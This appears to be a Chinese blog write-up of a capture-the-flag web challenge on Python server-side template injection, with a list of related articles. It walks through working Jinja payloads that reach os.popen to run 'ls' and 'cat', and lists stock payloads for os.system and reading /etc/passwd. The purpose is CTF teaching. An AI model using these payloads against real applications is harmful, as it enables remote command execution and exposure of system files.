攻防世界 python 注入漏洞

最新推荐文章于 2023-02-28 22:40:44 发布
最新推荐文章于 2023-02-28 22:40:44 发布
阅读量1.2k 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45449318/article/details/105302194
版权

web_python_template_injection解题思路:
首先看到题目,就知道这道题是关于模板注入的,什么是模板注入呢?-为了写html代码的时候方便,很多网站都会使用模板,先写好一个html模板文件,比如

deftest():
code=request.args.get('id')
html='''
      <h3>%s</h3>
'''%(code)
return render_template_string(html)

这段代码中的html就是一个简单的模板文件,当开发者想要这个模板对应的样式时,可以直接用render_template_string方法来调用这个模板,从而直接把这个样式渲染出来。而模板注入,就是指将一串指令代替变量传入模板中让它执行,以这段代码为例,我们在传入code值时,可以用{{}}符号来包裹一系列代码,以此替代本应是参数的id

http://..../?id={{代码}}

知道了什么是模板文件,接下来开始模板注入环节:首先,先测试一下是不是确实能注入,构造一个简单的测试url:http://111.198.29.45:46675/{{7*7}}
服务器回传:`URLhttp://111.198.29.45:46675/49 not found``

/49的存在说明7*7这条指令被忠实地执行了。接下来,开始想办法编代码拿到服务器的控制台权限 首先,题目告诉我们这是一个python注入问题,那么脚本肯定也是python的,思考怎样用python语句获取控制台权限:想到了os.systemos.popen([参考资料](https://blog.csdn.net/sxingming/article/details/52071514)),这两句前者返回**退出状态码**,后者**以file形式**返回**输出内容**,我们想要的是内容,所所以选择os.popen`

知道了要用这一句,那么我要怎么找到这一句呢?python给我们提供了完整的寻找链(参考资料)
class:返回对象所属的类
mro:返回一个类所继承的基类元组,方法在解析时按照元组的顺序解析。
base:返回该类所继承的基类 //base__和__mro__都是用来寻找基类的__subclasses:每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
init:类的初始化方法
globals:对包含函数全局变量的字典的引用
首先,找到当前变量所在的类:
111.198.29.45:46675/%7B%7B''.__class__%7D%7D
服务器回复:`URLhttp://111.198.29.45:46675/<type’str’>notfound

`发现这个回复里已经告诉我们这个变量的类是’str’了。-

接下来,从这个类找到它的基类:http://111.198.29.45:46675/%7B%7B''.__class__.__mro__%7D%7D
服务器回复:URLhttp://111.198.29.45:46675/(<type'str'>,<type'basestring'>,<type'object'>)notfound

然后,通过基类来找其中任意一个基类的引用列表:

http://111.198.29.45:46675/%7B%7B''.__class__.__mro__[2].__subclasses__()%7D%7D

这里有个小细节,__mro__[]中括号里填谁其实区别都不大,这些基类引用的东西都一样
服务器回复了很长的一个列表,我就不列举了,从其中可以找到我们想要的os所在的site._Printer类,它在列表的第七十二位,即__subclasses__()[71]

通过__subclasses__()[71].__init__.__globals__['os'].popen('命令行语句').read()调用服务器的控制台****并显示,这下我们就可以随便用控制台输出了
直接填命令语句:
http://111.198.29.45:46675/%7B%7B''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()%7D%7D

从这里我们看到,flag存在一个叫fl4g的无后缀文件里,那就好办了,再构造一个payload,用cat读一下内容

`http://111.198.29.45:46675/%7B%7B''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('catfl4g').read()%7D%7D

flag到手~
##注意事项:

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('catfl4g').read()

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()

以上payload是非常常用的payload
参照:攻防世界的WP
python模板注入

qq_45449318
关注
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1038
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1173
好难啊
什么是命令注入漏洞
Ping_Pig的博客
08-11 4822
漏洞原因: web应用程序有时需要调用一些系统命令的函数,如PHP中的system,exec,shell-exec等等,当用户能够控制这些函数中的参数时,就可以将恶意参系统命令拼接到正常命令中,从而造成命令注入攻击 漏洞形成需要同时满足以下三个条件: 使用了内部调用shell的函数(system,exec) 将外界传入的参数传递给内部调用shell的函数 参数中shell的元字符没有被转...
python的常见命令注入威胁
12-25
ah!其实没有标题说的那么严重! 不过下面可是我们开发产品初期的一些血淋淋的案例,更多的安全威胁可以看看北北同学的《python hack》PPT,里面提及了不只命令执行的威胁,那些都是我们亲身经历的代码。 千万要记得执行命令的时候,不要信任其他传入数据就行了,既然意识到问题,那么修复方法是多种多样的。 在我们的系统中,多处出现问题然后修修补补是不靠谱的,那么我们需要一个通用的安全执行接口,这个接口过后更新进来。 此外,我们在开发新功能的时候,也要掌握安全编程的规范技巧,这些技巧不局限在命令执行安全。 总结了一下,就是一下几点要素啦: •命令执行的字符串不要去拼接输入的参数,非要拼接的话,要对
python注入_python的常见命令注入威胁
weixin_39618169的博客
12-04 461
ah!其实没有标题说的那么严重!不过下面可是我们开发产品初期的一些血淋淋的案例,更多的安全威胁可以看看北北同学的《python hack》PPT,里面提及了不只命令执行的威胁,那些都是我们亲身经历的代码。千万要记得执行命令的时候,不要信任其他传入数据就行了,既然意识到问题,那么修复方法是多种多样的。在我们的系统中,多处出现问题然后修修补补是不靠谱的,那么我们需要一个通用的安全执行接口,这个接口过后...
python直接执行代码漏洞_警惕OS命令注入漏洞 - python
weixin_39805851的博客
12-11 496
OS命令注入漏洞是一个十分严重,但是又十分容易被人忽视的一个问题。漏洞原理在后台开发过程中,经常会遇到需要执行一些shell命令,但是命令的参数需要通过Restful API传入,举个简单的例子:后台实现了一个ping的功能,用户可以指定ping的目标,假设后台代码:def ping(target):return subprocess.getstatusoutput('ping -c 1 %s' ...
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1516
本例中以靶机DVWA中的盲注为例。
CVE-2022-0391
qq_29060627的博客
06-11 2037
Python 注入漏洞 CVE-2022-0391
攻防世界miss-01,杂项misc太湖杯
11-01
在网络安全的“攻防世界”平台上,这类杂项问题通常涵盖广泛的技术领域,可能包括但不限于密码学、网络协议分析、漏洞利用、代码审计、社会工程等。解决这类问题需要对网络安全有全面的理解,以及一定的逻辑推理和...
攻防世界——WEB题目Ikun_BILIBILI
Y_KolaFish_Y的博客
07-27 1750
ikun_bilibili_wp 一、获取lv6账号位置 import requests target = "http://111.200.241.244:61777/shop?page=%d" for i in range(500): print(i) res = requests.get(target%(i)).text if "lv6.png" in res: print(target%(i)) break http://111.200.241
攻防世界】十四 --- Web_python_template_injection --- SSTI
qq_43168364的博客
12-27 435
题目 — Web_python_template_injection 考点:SSTI(服务器模板注入) 一、知识点 1. 何为模板注入 模板引擎可以让(网站)程序实现 界面 与 数据 分离,业务代码 与 逻辑代码 的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。 但是模板引擎也拓宽了我们的攻击面。注入到模板中的代码可能会引发 RCE 或者 XSS 2. flask基础 (1)路由 from flask import flask @app.route('/index/'
python os.popen基础/os.popen 安全注入(OS命令注入漏洞\subprocess.getstatusoutput OS命令注入漏洞)、python 过滤命令注入危险字符
西京刀客
04-29 7378
文章目录一、python OS命令注入漏洞1. 警惕subprocess.getstatusoutput OS命令注入漏洞2. os.popen OS命令注入漏洞os.popen基础python os.popen OS命令注入漏洞 一、python OS命令注入漏洞 1. 警惕subprocess.getstatusoutput OS命令注入漏洞 python直接执行代码漏洞_警惕OS命令注入漏洞 - python篇 参考URL: https://blog.csdn.net/weixin_3980585
攻防世界--Web进阶--easytornado---模板注入
z2560088的博客
10-11 262
目录 信息搜集 模板注入 生成filehash 信息搜集 发现flag的位置,于是我们试试能不能访问 报错了 查看/welcome.txt 由于render({options})可以猜测有模板注入漏洞。 /hints.txt提醒md5(cookie_secret+md5(filename)) 这个应该是file的hash算法了 filename应该是/fllllllllllllag cookie_secret不清楚 模板注入...
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 389
攻防世界easytornado-tornado模板注入
攻防世界shrine 模板注入
qq_43774856的博客
12-16 336
shrine 打开链接,这里直接给出了源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def
获取最新漏洞CVEPython
渗透测试
12-19 632
可以添加发送邮件模块进行漏洞自动预警,也可以接入微信模块,在群中自动预警。源:腾讯、华为、绿盟、启明星辰、CNNVD。结果输出为xlsx文件。
python怎么防止命令注入_Python3命令注入防范
weixin_35853083的博客
02-04 1176
一、背景说明说实话自己是做安全的,平时总是给别人代码找茬,但轮到自己写代码有时比开发还不注重安全,其中有安全脚本一般比较小考虑安全那么处理安全问题的代码比重将会大大超过业务代码的问题也有不是专职开发添加一项功能还没开发那么熟练的问题。由于安全脚本一般不是对外开启服务的,所以一般也不会暴出什么问题。但前段时间被拉群通知说自己写的一个脚本存在命令注入漏洞,开始很讶异,经沟通和分析之后发现是因为脚本有通...
以下关于python命令注入_python的常见命令注入威胁 -电脑资料
weixin_39863371的博客
02-05 270
ah!其实没有标题说的那么严重!不过下面可是我们开发产品初期的一些血淋淋的案例,更多的安全威胁可以看看北北同学的《python hack》PPT,里面提及了不只命令执行的威胁,那些都是我们亲身经历的代码,千万要记得执行命令的时候,不要信任其他传入数据就行了,既然意识到问题,那么修复方法是多种多样的。在我们的系统中,多处出现问题然后修修补补是不靠谱的,那么我们需要一个通用的安全执行接口,这个接口过后...
攻防世界WEB高手进阶之python_template_injection
uihijio的博客
05-18 442
打开网站是写着以下 然后测试以下{{1+1}}被执行了 然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag 使用{{’’.class.mro[2].subclasses()40.read()}}打开
攻防世界web_python_template_injection
最新发布
03-16
攻防世界中的web_python_template_injection是一种Web应用程序漏洞,它允许攻击者通过注入恶意代码来执行任意操作。这种漏洞通常出现在使用Python模板引擎的Web应用程序中,攻击者可以通过注入Python代码来执行任意操作,例如读取文件、执行命令等。为了防止这种漏洞,开发人员应该对输入进行严格的过滤和验证,以确保输入不包含任何恶意代码。同时,使用最新版本的Python模板引擎和Web框架也可以帮助减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值